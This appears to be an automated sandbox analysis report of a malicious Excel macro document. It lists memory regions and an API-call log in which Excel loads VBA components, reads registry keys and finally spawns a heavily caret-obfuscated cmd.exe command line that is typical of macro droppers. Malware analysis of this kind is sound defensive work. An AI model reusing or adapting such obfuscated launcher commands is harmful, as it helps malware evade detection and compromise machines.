pagefile_0x0000000004250000	0x04250000	0x04250fff	Pagefile Backed Memory	rw	-
private_0x0000000004260000	0x04260000	0x0426ffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x04270000	0x0428ffff	Memory Mapped File	r	-
c_1255.nls	0x04290000	0x042a0fff	Memory Mapped File	r	-
pagefile_0x00000000042b0000	0x042b0000	0x042b1fff	Pagefile Backed Memory	r	-
private_0x00000000042c0000	0x042c0000	0x042cffff	Private Memory	rw	-
private_0x00000000042d0000	0x042d0000	0x042d0fff	Private Memory	rw	-
pagefile_0x00000000042e0000	0x042e0000	0x042e1fff	Pagefile Backed Memory	r	-
private_0x00000000042f0000	0x042f0000	0x0436ffff	Private Memory	rw	-
private_0x0000000004370000	0x04370000	0x0446ffff	Private Memory	rw	-
private_0x0000000004470000	0x04470000	0x04481fff	Private Memory	rw	-
private_0x0000000004490000	0x04490000	0x04492fff	Private Memory	rw	-
private_0x00000000044a0000	0x044a0000	0x0451ffff	Private Memory	rwx	-
pagefile_0x0000000004520000	0x04520000	0x0491ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000004920000	0x04920000	0x04921fff	Pagefile Backed Memory	r	-
private_0x0000000004930000	0x04930000	0x04930fff	Private Memory	rw	-
private_0x0000000004940000	0x04940000	0x04a3ffff	Private Memory	rw	-
private_0x0000000004a40000	0x04a40000	0x04a51fff	Private Memory	rw	-
private_0x0000000004a60000	0x04a60000	0x04b5ffff	Private Memory	rw	-
private_0x0000000004b60000	0x04b60000	0x04f5ffff	Private Memory	rw	-
private_0x0000000004f60000	0x04f60000	0x04f60fff	Private Memory	rw	-
private_0x0000000004f70000	0x04f70000	0x04f70fff	Private Memory	rw	-
private_0x0000000004f80000	0x04f80000	0x04f80fff	Private Memory	rw	-
private_0x0000000004f90000	0x04f90000	0x04f90fff	Private Memory	rw	-
private_0x0000000004fa0000	0x04fa0000	0x04fa0fff	Private Memory	rw	-
private_0x0000000004fb0000	0x04fb0000	0x050affff	Private Memory	rw	-
private_0x00000000050b0000	0x050b0000	0x050b0fff	Private Memory	rw	-
private_0x00000000050c0000	0x050c0000	0x050c0fff	Private Memory	rw	-
private_0x00000000050d0000	0x050d0000	0x050d0fff	Private Memory	rw	-
private_0x00000000050e0000	0x050e0000	0x051dffff	Private Memory	rw	-
private_0x00000000051e0000	0x051e0000	0x051e2fff	Private Memory	rw	-
private_0x00000000051f0000	0x051f0000	0x052effff	Private Memory	rw	-
private_0x00000000052f0000	0x052f0000	0x05337fff	Private Memory	rw	-
private_0x0000000005340000	0x05340000	0x0534ffff	Private Memory	rw	-
private_0x0000000005350000	0x05350000	0x0535ffff	Private Memory	rw	-
private_0x0000000005360000	0x05360000	0x05361fff	Private Memory	rw	-
private_0x0000000005370000	0x05370000	0x0546ffff	Private Memory	rw	-
private_0x0000000005470000	0x05470000	0x05470fff	Private Memory	rw	-
private_0x0000000005480000	0x05480000	0x0557ffff	Private Memory	rw	-
pagefile_0x0000000005580000	0x05580000	0x05d7ffff	Pagefile Backed Memory	rw	-
kernelbase.dll.mui	0x05d80000	0x05e3ffff	Memory Mapped File	rw	-
private_0x0000000005e40000	0x05e40000	0x05e40fff	Private Memory	rw	-
private_0x0000000005e50000	0x05e50000	0x05f4ffff	Private Memory	rw	-
pagefile_0x0000000005f50000	0x05f50000	0x06292fff	Pagefile Backed Memory	r	-
segoeui.ttf	0x062a0000	0x0631efff	Memory Mapped File	r	-
private_0x0000000006320000	0x06320000	0x06320fff	Private Memory	rw	-
private_0x0000000006330000	0x06330000	0x06330fff	Private Memory	rw	-
private_0x0000000006340000	0x06340000	0x06340fff	Private Memory	rw	-
private_0x0000000006350000	0x06350000	0x06350fff	Private Memory	rw	-
private_0x0000000006360000	0x06360000	0x0645ffff	Private Memory	rw	-
private_0x0000000006460000	0x06460000	0x064dffff	Private Memory	rw	-
private_0x00000000064e0000	0x064e0000	0x06527fff	Private Memory	rw	-
private_0x0000000006530000	0x06530000	0x06530fff	Private Memory	rw	-
private_0x0000000006540000	0x06540000	0x06540fff	Private Memory	rw	-
private_0x0000000006550000	0x06550000	0x06550fff	Private Memory	rw	-
private_0x0000000006560000	0x06560000	0x06560fff	Private Memory	rw	-
private_0x0000000006570000	0x06570000	0x0666ffff	Private Memory	rw	-
private_0x0000000006670000	0x06670000	0x0676ffff	Private Memory	rw	-
private_0x0000000006770000	0x06770000	0x06770fff	Private Memory	rw	-
private_0x0000000006780000	0x06780000	0x0687ffff	Private Memory	rw	-
private_0x0000000006880000	0x06880000	0x0697ffff	Private Memory	rw	-
private_0x0000000006980000	0x06980000	0x06a7ffff	Private Memory	rw	-
private_0x0000000006a80000	0x06a80000	0x06a80fff	Private Memory	rw	-
private_0x0000000006a90000	0x06a90000	0x06a90fff	Private Memory	rw	-
private_0x0000000006aa0000	0x06aa0000	0x06b1ffff	Private Memory	rw	-
private_0x0000000006b20000	0x06b20000	0x06b20fff	Private Memory	rw	-
For performance reasons, the remaining 373 entries are omitted. The remaining entries can be found in flog.txt.

Threads

Thread 0x8fc

1025

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:02 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 127749	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = Unknown module name, base_address = 0x13f1d0000	1	Fn
Module	Load	module_name = Comctl32.dll, base_address = 0x7fefc690000	1	Fn
Module	Get Handle	module_name = MSI.DLL, base_address = 0x7fefa750000	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fefa7d3b3c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fefa7ca13c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fefa7d1618	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fefa7cf088	1	Fn
Module	Get Handle	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee5a40000	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee5b472c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee5ab60b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee5a61a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee5ab5f50	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee5a5f000	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee5a4e860	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee5a43fc0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee5a52380	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee5a47b80	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee5a47b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee5a48730	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee5b83260	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee5b83280	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee5a51f40	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee5ab6370	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee5aa4590	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee5a455b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee5a50240	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee5a43d10	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee5a46d30	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee5a43d40	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee5a4e6f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee5a4df40	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee5a47bf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee5a4fcd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee5a48b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee5b42ef0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee5a542c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee5a43e20	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee5a4ab10	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee5a4a7d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee5a41550	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee5a4e830	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee5a413d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee5a46660	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee5a41500	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee5a43dd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee5b471e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee5b16d10	1	Fn
Module	Get Address	module_name = Unknown module name, function = VbeuiFIsEdpEnabled, address_out = 0x7fee5b898e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VbeuiEnterpriseProtect, address_out = 0x7fee5b89830	1	Fn
Environment	Get Environment String	name = DDRYBUR	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
Module	Load	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLL, base_address = 0x7fee5a10000	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Licenses	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = }	1	Fn
Module	Load	module_name = OLEAUT32.DLL, base_address = 0x7feffd80000	1	Fn
Module	Get Address	module_name = Unknown module name, function = SysFreeString, address_out = 0x7feffd81320	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7feffd8f1e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7feffddcaa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7feffe11760	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7feffdac760	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7feffddecd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7feffdde840	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7feffdef420	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7feffde4ec0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7feffde9350	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7feffdb6e40	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7feffdef320	1	Fn
Window	Create	class_name = ThunderMain, wndproc_parameter = 0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = USER32, base_address = 0x77a20000	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetSystemMetrics, address_out = 0x77a394f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MonitorFromWindow, address_out = 0x77a35f08	1	Fn
Module	Get Address	module_name = Unknown module name, function = MonitorFromRect, address_out = 0x77a32b00	1	Fn
Module	Get Address	module_name = Unknown module name, function = MonitorFromPoint, address_out = 0x77a2ab64	1	Fn
Module	Get Address	module_name = Unknown module name, function = EnumDisplayMonitors, address_out = 0x77a35c30	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetMonitorInfoA, address_out = 0x77a2a730	1	Fn
Module	Get Address	module_name = Unknown module name, function = EnumDisplayDevicesA, address_out = 0x77a2a5b4	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = oleaut32.dll, base_address = 0x7feffd80000	1	Fn
Module	Get Address	module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feffd82270	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feffd8a550	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feffe120d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feffe0dbd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feffd85c90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feffd86330	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feffda66c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feffd84710	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feffd848f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feffdbb640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feffdbb360	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feffdc2640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feffda58a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feffda5820	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feffdbaf20	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feffdda0c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feffe12160	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feffda5af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feffda5a90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feffda5a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feffda5a30	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feffd860b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feffd83e90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feffdd9f80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormat, address_out = 0x7feffe09b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feffe09aa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feffe09990	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feffe09890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feffe09770	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feffdeb8d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMonthName, address_out = 0x7feffdeb800	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAdd, address_out = 0x7feffe048e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAnd, address_out = 0x7feffe09470	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCat, address_out = 0x7feffe096a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDiv, address_out = 0x7feffe02fe0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarEqv, address_out = 0x7feffe09cf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarIdiv, address_out = 0x7feffe08ff0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarImp, address_out = 0x7feffe09c00	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMod, address_out = 0x7feffe08e60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMul, address_out = 0x7feffe03690	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarOr, address_out = 0x7feffe092d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarPow, address_out = 0x7feffe02e80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarSub, address_out = 0x7feffe03f90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarXor, address_out = 0x7feffe091a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAbs, address_out = 0x7feffde7c30	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFix, address_out = 0x7feffde7a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarInt, address_out = 0x7feffde7890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNeg, address_out = 0x7feffde7ea0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNot, address_out = 0x7feffe09600	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarRound, address_out = 0x7feffde76a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCmp, address_out = 0x7feffe083f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feffdb3070	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feffdbd700	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feffdbd890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feffd9caf0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feffda8a00	1	Fn
System	Get Time	type = Local Time, time = 2018-11-06 10:24:03 (Local Time)	2	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = RequireDeclaration, data = 129, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = CompileOnDemand, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BackGroundCompile, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnAllErrors, data = 255, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = BreakOnServerErrors, data = 0, type = REG_NONE	1	Fn
Module	Get Address	module_name = Unknown module name, address_out = 0x7fee5a4fcd0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\409	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\9	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020813-0000-0000-C000-000000000046}\1.9\0\win64, data = C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\root\office16\excel.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260	1	Fn
Module	Get Address	module_name = Unknown module name, address_out = 0x0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64, data = C:\Windows\system32\stdole2.tlb	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64, data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL	1	Fn
System	Get Time	type = Local Time, time = 2018-11-06 10:24:03 (Local Time)	2	Fn
System	Get Cursor	x_out = 555, y_out = 565	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common, value_name = VbaCapability, data = 180	1	Fn
System	Get Time	type = Local Time, time = 2018-11-06 10:24:07 (Local Time)	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	1	Fn
Module	Load	module_name = VBE7.DLL, base_address = 0x7fee5ce0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = 600, address_out = 0x7fee5de4ee0	1	Fn
Keyboard	Read	virtual_key_code = VK_ESCAPE, result_out = 0	10	Fn
Process	Create	process_name = CMD.Exe /c ^F^o^r ; /^f ;; " tokens= +2 delims=FeH" , %^1,; iN , ( , ', , ^^f^^t^^Yp^^e ;^\|;^^f^^IN^^d , ;, "SHCm" , , ; ' ; , ) , , ,^d^O ,%^1, ; ; ; pPuxarv^/^VC^s^v^4^0^b^l^b^kn^ ^ ^ , cw8f/^r ", ( , ; , ; ,( , ; , ;,;, (s^e^T^ ^ ^ ^ ^ ^+^~^}{=^e^o^2^8^P^G^C^7^y.Y^.^Y^e^o^2^v^T^d^]^F^3^p^b^f^6^K^'^.^Y^1^.^Y^@eo^2^h^8^P^Z^7^y8^P^3^p^T^d^e^3^7^{^j^Un^P^jy+^@^e^o^2^%^z^w^L^h^wLT^d^3p^e^3^7^{^j^Un^#^P^j^y^+^2^X^b^2^)^.^Y^1^1^2^eo^2^2^+^26^3^p^.^Y^F3^p^2^+^2^]^2^+^2^.^Y^q^F^3^p^b^fN^2^+^2^8^P^4^-^P^j^3^Q^e^A^C^h^8^P^Z^8^P^,2^+^2^GC^7^y^2^+^2^[2^+^2^7^K^2^+^2^3^7^37^-^%^2^+^2^`k^7^y^8^P^.^Y^-7^K^e^o2^2^+^2^eo^2^8^Pm3^Qe^AC^3^p`^2^+2^q^F^3^p^bfN^6^m^8^P^.^Y^A^C^6^7^j^h`^e^o^2^G^C^7^y^8^P^m^'^j^U^]^6^2^+^2^4^2^+^2^Zn^.^AC^6^7^[^2^+^2^F^3^p^bf^b^f^k7y^u^u^Q^e^3^7^e^o^2^2+^2^6^K^F^3^p^]^.Y^j^h`^e^o^2^G^C^7^y^8^P^2^+^2^m^'^2^+^2^j^U^]^6^4^Zn^2^+2^.^'^u^2^+^2^Z^G^C^7^y^m^6^k^7^y^1^1F^3^p^]^.^Y^q^F^3^p^b^fN^8^P^G^C^7^y'a^2^+^2^8^P^3^QeA^C^7^y^j^U6^2^+2^3p^Z8^Pn^G^C7^y^)^'^2^+^2Pj^k^7^y^8^Pn^R^8^P^6^3^7^1^A^C6^2^+^2^7^2^+^2^%^z^w^LhG^C^7y^G^C7^y^k^7^y^e^o^2^8^ ^,^.^,.^Z^m^6.^2+^2^8^P^e^o^2^4ax^'^Zm^.^3^Q^e^AC^X2^+^2^7^'^,^X^2^+2^m^,^.^A^C^ ^,^.^F3^p^j^Un^,^.^2^+^2^.^6^G^C^7^y4^a^x^u^Q^e^7^y^e^o2^K_^X^'^2^+^2^k^7^yn^.^A^C^6^7^2^+2^)^)^[^2^+^2^F3^p^b^f^b^f^k^7^y^u^u^Q^e^2^+^2m^Q^e^6^KF^3^p^]^.^Y^u^`2^+^2^G^C^7y^2+^2^8^P^{^Pjy^.^Y^2^+^2^4^a^xj^Un^H^ ^[1^ ^'^2^+^2^'^H^)^3^Q^e^A^C^2^+^2^j^h^2^+^2^h^8^PZo^\^F^3^p^X^]^8^P^6^,^%^z^w^Lh^1^2^+^2^F^3^p^b^f^2^+^2^b^f^2^+^2k^7^y^uu^Q^e^7^.Y^Zn^1^ 